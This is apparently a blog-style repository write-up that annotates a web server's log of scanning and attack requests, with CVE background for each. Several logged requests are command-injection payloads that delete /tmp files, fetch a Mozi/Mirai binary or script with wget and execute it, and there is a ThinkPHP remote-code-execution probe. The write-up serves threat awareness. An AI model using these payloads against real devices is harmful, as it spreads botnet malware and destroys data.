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File metadata and controls

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Inspecting Malicious Requests

I recently stood up a crude web application and my logs were capturing various requests my public IP was attracting. I had seen some such requests before but finally decided it warranted a blog post, and you can read more there.

Otherwise, I'm posting this in a repository as a point of collaboration if any of my readers want to correct, inform, or expand.

Log Lines and Narration

2021-04-25T10:19:17: GET /mysql/index.php?lang=en 404 0.940 ms - 1103

PHP is a mainstay in the web development community, and there are many sites describing how it can integrate with mySQL. 'Index' here with the php extension implies some code process and not simply fetching a static resource (such as an html file). Since this is under the mysql resource, it appears to be a big sniff to see if a console to the mysql db has been left open.

2021-04-25T10:21:27: GET /shell?cd+/tmp;rm+-rf+*;wget+;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.964 ms - 1103

Immediately one can recognize the shell resource, that this is a flavor of a bashdoor attack or attempting to insert and invoke arbitrary code at the command line level. It first tries to clear out everything in the 'tmp' direcotry (cd /tmp; rm -rf *) before fetching (wget) a remotely hosted file ('Mozi.a`, part of the Mirai botnet) and then tries to invoke.

2021-04-25T11:17:53: GET 404 1.033 ms - 1103

Not an attack, rather something particular to AWS EC2 instance metadata. I believe it's the AWS SDK (within my NodeJS application) locally looking for the metadata containing the AWS credentials (since my web app was integrated with DynamoDB). Noteworthy is the IP is special to every EC2 instance.

2021-04-25T11:49:04: POST /HNAP1/ 404 0.837 ms - 1103

Home Network Administration Protocl (HNAP) is a Cisco proprietary protocl for managing network devices, going back to 2007. There was a worm back in 2014, which used the HNAP1 protocol to identify specific Linksys routers (firmware etc.), and then send a second request to invoke an exploit at the CGI/script level.

2021-04-25T14:57:06: GET /.env 404 0.919 ms - 1103

The .env is not specific to one framework or language, but actually closert to industry convention. I think this request is simply hoping that the server is simply hosting a directory and that an .env might be exposed possibly revealing things like API or credential keys/tokens.

2021-04-25T17:00:00: POST

I tried the URl, and it was a 'Not Found', so who knows. Maybe someone is hoping to get more traffic to a site laiden with ads.

2021-04-25T18:04:09: GET /config/getuser?index=0 404 0.940 ms - 1103

Specific D-Link wi-fi camears had a vulnerability where the remote administrator vould be directly queried without authentication! Hoorah for the National Vulnerability Database (NIST), the page for this vulnerability in particular was fun to read through and click the links deeper into the vulnerability and who/how it was uncovered.

2021-04-25T20:12:45: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 1.083 ms - 1103

This is a vulnerability for specific version of PHPUnit, where arbitrary PHP code could be executed! Here's a very detailed story (by a PHP expert), on how this impacted a retail website. The first link is to, a vulnerability catalog sponsored by USA's DHS and CISA, and the actual site is maintained by the MITRE Corp.

2021-04-25T20:12:45: POST /api/jsonws/invoke 404 0.656 ms - 1103

Liferay is a digital portal/platform product, which had a JSON (deserialization) and remove code execution vulnerability (CVE-2020-7961) in March of 2020 and documented by Code White. Bonus, someone created a scanner (github) for this vulnerability.

2021-04-25T20:12:45: GET /solr/admin/info/system?wt=json 404 0.989 ms - 1103

Ranked as the #7 Web Service Exploit of 2020, even though Apache published an issue back in 2013! The above request is a scan looking for specific versions of Apache Solr (search platform), where a particular parameter is exposed and can lead to arbitrary file reading. Apparently this is combined with some other vulnerabilities to eventually get to remote code execution, detailed in CVE-2013-6397.

No Narration (yet)

2021-04-25T20:12:45: GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 404 0.918 ms - 1103
2021-04-25T20:12:45: GET /wp-content/plugins/wp-file-manager/readme.txt 404 0.866 ms - 1103
2021-04-25T20:12:46: POST /Autodiscover/Autodiscover.xml 404 1.512 ms - 1103
2021-04-25T20:12:46: GET /console/ 404 0.771 ms - 1103
2021-04-25T20:12:46: GET /_ignition/execute-solution 404 0.936 ms - 1103
2021-04-25T22:00:03: GET /.env 404 4.342 ms - 1103
2021-04-25T22:00:04: POST / 404 0.994 ms - 1103
2021-04-26T06:08:45: POST /GponForm/diag_Form?images/ 404 0.736 ms - 1103
2021-04-26T10:42:36: GET /laravel/.env 404 0.658 ms - 1103
2021-04-26T10:42:36: GET /app/.env 404 0.619 ms - 1103
2021-04-26T10:42:36: GET /application/configs/application.ini 404 0.712 ms - 1103
2021-04-26T10:42:36: GET /application/application.ini 404 0.656 ms - 1103
2021-04-26T10:42:36: GET /vendor/laravel/.env 404 0.641 ms - 1103
2021-04-26T10:42:36: GET /wp-content/uploads/wc-logs/ 404 0.677 ms - 1103
2021-04-26T11:38:52: POST /Autodiscover/Autodiscover.xml 404 0.836 ms - 1103
2021-04-26T11:38:52: GET /console/ 404 0.711 ms - 1103
2021-04-26T11:38:53: GET /_ignition/execute-solution 404 1.475 ms - 1103
2021-04-26T16:41:52: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+;sh+netgear&curpath=/&currentsetting.htm=1 404 0.969 ms - 1103